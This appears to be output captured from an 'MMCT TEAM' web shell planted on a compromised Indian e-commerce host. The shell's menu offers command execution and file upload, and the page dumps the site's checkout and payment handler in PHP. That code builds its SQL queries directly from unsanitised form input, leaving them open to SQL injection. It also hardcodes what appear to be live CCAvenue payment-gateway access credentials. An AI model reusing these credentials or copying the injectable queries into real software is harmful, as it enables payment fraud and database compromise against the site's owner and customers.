MMCT TEAM

Server IP : 82.112.239.40 / Your IP : 216.73.216.81
Web Server : LiteSpeed
System : Linux in-mum-web1676.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
User : u641149403 ( 641149403)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF
Directory (0777) : /home/u641149403/domains/uniformindia.co.in/public_html/admin/../
[ Home ]	[ C0mmand ]	[ Upload File ]
Current File : /home/u641149403/domains/uniformindia.co.in/public_html/admin/../ccavRequestHandler.php
<?php
session_start();
date_default_timezone_set("Asia/Kolkata"); 
include('Crypto.php');
include('send_mail.php');

if(isset($_POST['chk_out'])){
	$user_id=$_SESSION['id'];
	$amount=$_POST['amount'];
	$base_amount=$_POST['base_amount'];
	$delivery_charge=$_POST['delivery_charge'];
	$addr=$_POST['billing_address'];
	$payment_method=$_POST['payment_method'];
	$promo_code=$_POST['promocode'];
	$promo_discount=$_POST['promo_discount'];
	$location_id =$_POST['location_id'];
	$num=$_POST['billing_tel'];
	$dlvtime=$_POST['dlvtime'];

	$order_id=$_POST['order_id'];
	$or_id=$_POST['or_id'];
	$or_id=explode(',', $or_id);
	$dlvday=$_POST['dlvday'];
	$dlv=$dlvday.'-'.$dlvtime;
	$full_addr=$addr;
	$date = date('Y-m-d H:i:s');
	$total=$amount+$delivery_charge;
	$user_locations=mysqli_query($con,"SELECT * FROM user_location WHERE location_id='$location_id'");
	$user_location=mysqli_fetch_array($user_locations);

	$res=mysqli_query($con,"SELECT * FROM users WHERE id='$user_id'");
	$row=mysqli_fetch_array($res);
	$user_name=$row['name'];
	$mobile=$row['mobile'];
	$email=$row['email'];
	if($mobile==''){
		$mobile=$num;
		mysqli_query($con,"UPDATE users SET mobile='$mobile',street='$full_addr' WHERE id='$user_id'");
	}
	$sql="INSERT INTO orders (user_id,oid,mobile,total,delivery_charge,discount,final_total,payment_method,wallet_balance,status,active_status,date_added,address,delivery_time,promo_code,promo_discount,location_id) VALUES ('$user_id','$order_id','$mobile','$base_amount','$delivery_charge','0','$amount','$payment_method','0','received','received','$date','$full_addr','$dlv','$promo_code','$promo_discount','$location_id')";
	mysqli_query($con,$sql);
	$last_id = mysqli_insert_id($con);
	if($_POST['payment_method']=='Paid'){
		$_SESSION['order_id']=$last_id;
	}
	$status[] = array('received',date("d-m-Y h:i:s") );
	// for($i=0;$i<=count($or_id);$i++){
		$or_new_id=$or_id[$i];
		$new_sql="UPDATE order_items SET order_id='$last_id',odr_id='$order_id',status='received',active_status='received',date_added='$date' WHERE user_id='$user_id' and order_id=0";

		$res=mysqli_query($con,$new_sql);
	// }
	$con->query("UPDATE promo_codes SET no_of_users=no_of_users-1 WHERE promo_code='$promo_code'");

 // send to mail
	if ($_POST['payment_method']=='Cash On Delivery') {

		$message='<html>
		<head>
		<title>Uniform India Order Details</title>
		<style>
		.card{
			border: 1px solid #dee2e6;
		}
		.card-body{
			padding: 20px;
		}
		.heading{
			background-color: #3c9fd9;
			color: #fff;
			padding: 20px;
			margin: 0;
		}
		h3{
			color: var(--main-color);
		}
		table{
			width: 100%;
			margin-bottom: 1rem;
			color: #212529;
			border-collapse: collapse;
			text-align: left;
		}
		table td, table th {
			padding: 0.75rem;
			vertical-align: top;
			border: 1px solid #dee2e6;
		}
		.address th{
			border: none;
			color: var(--main-color);
			padding-left: 0;
		}
		</style>
		</head>
		<body>
		<div class="card">
		<h1 class="heading">Thank you for your order</h1>
		<div class="card-body">
		<p>Hi '.$user_name.',</p>
		<p>Just to let you know - we have recelved your order #'.$last_id.', and It Is now belng
		processed:</p>
		<p>Additional Shipping charges of Rs. '.number_format($delivery_charge,2).' is applicable on this order.</p>
		<h3>[Order #'.$last_id.'] '.date('F d, Y').'</h3>
		<table>
		<thead>
		<tr>
		<th>Product</th>
		<th>Quantity</th>
		<th>price</th>
		</tr>
		</thead>
		<tbody>';
		$query=$con->query("SELECT * FROM order_items Where order_id='$last_id'");
		$sub_total=0;
		while($product=mysqli_fetch_array($query)){
			
			$pr_vr_id=$product['product_variant_id'];
			$join="SELECT *,products.id as product_id FROM products INNER JOIN product_variant ON products.id = product_variant.product_id WHERE product_variant.id='$pr_vr_id'";
			$res_join=mysqli_query($con,$join);
			$row_join=mysqli_fetch_array($res_join);
			$sub_total+=$row_join['discounted_price']*$product['quantity'];
			$message .= '<tr>
			<td>'.$row_join['name'].'</td>
			<td>'.$product['quantity'].'</td>
			<td>₹'.number_format($row_join['discounted_price'],2).'</td>
			</tr>';
			 }
		$message .= '</tbody>
			<tfoot>
			<tr>
			<th colspan="2">Subtotal:</th>
			<td>₹'.number_format($sub_total,2).'</td>
			</tr>
			<tr>
			<th colspan="2">Shipping Charges:</th>
			<td>₹'.number_format($delivery_charge,2).'</td>
			</tr>
			<tr>
			<th colspan="2">Payment Method:</th>
			<td>Cash on delivery</td>
			</tr>
			<tr>
			<th colspan="2">Total:</th>
			<td>₹'.number_format($amount,2).'</td>
			</tr>
			</tfoot>

			</table>
			<table class="address">
			<tr>
			<th>Billing Address</th>
			<th>Shipping Address</th>
			</tr>
			<tr>
			<td><address>'.$user_name.'<br> '.$user_location['address'].' '.$user_location['city'].'-'.$user_location['pincode'].'<br> '.$user_location['state'].'</address></td>
			<td><address>'.$user_name.'<br> '.$user_location['address'].' '.$user_location['city'].'-'.$user_location['pincode'].'<br> '.$user_location['state'].'</address></td>
			</tr>
			</table>
			</div>
			</div>
			</body>
			</html>';
			$to=$email;
			$subject = "Your Uniform India Order has been received";
			$mail = send_email($to,$subject,$message);
			if($mail){
				header('Location:response.php');
			}
			echo $message;
		}else{ ?>
			<html>
			<head>
				<title>Payment</title>
			</head>
			<body>
				<center>
					<?php 
					error_reporting(0);

					$merchant_data='';
	$access_code='AVMM18KJ08AJ04MMJA';//Shared by CCAVENUES
	$working_key='59B7875D26C48D092974C8A7563D115B';//Shared by CCAVENUES
	
	foreach ($_POST as $key => $value){
		$merchant_data.=$key.'='.$value.'&';
	}

	$encrypted_data=encrypt($merchant_data,$working_key); // Method for encrypting the data.

	?>
	<form method="post" name="redirect" action="https://secure.ccavenue.com/transaction/transaction.do?command=initiateTransaction"> 
		<?php
		echo "<input type=hidden name=encRequest value=$encrypted_data>";
		echo "<input type=hidden name=access_code value=$access_code>";
		// echo "<input type=hidden name=user_id value=$user_id>";
		// echo "<input type=hidden name=amount value=$amount>";
		// echo "<input type=hidden name=delivery_charge value=$delivery_charge>";
		// echo "<input type=hidden name=promo_code value=$promo_code>";
		// echo "<input type=hidden name=promo_discount value=$promo_discount>";
		// echo "<input type=hidden name=billing_tel value=$num>";
		// echo "<input type=hidden name=dlvtime value=$dlvtime>";
		// echo "<input type=hidden name=or_id value=".$_POST['or_id'].">";
		// echo "<input type=hidden name=dlv value=$dlv>";
		// echo "<input type=hidden name=full_addr value=$full_addr>";
		?>
	</form>
</center>
<script language='javascript'>document.redirect.submit();</script>
</body>
</html>
<?php } } ?>
MMCT - 2023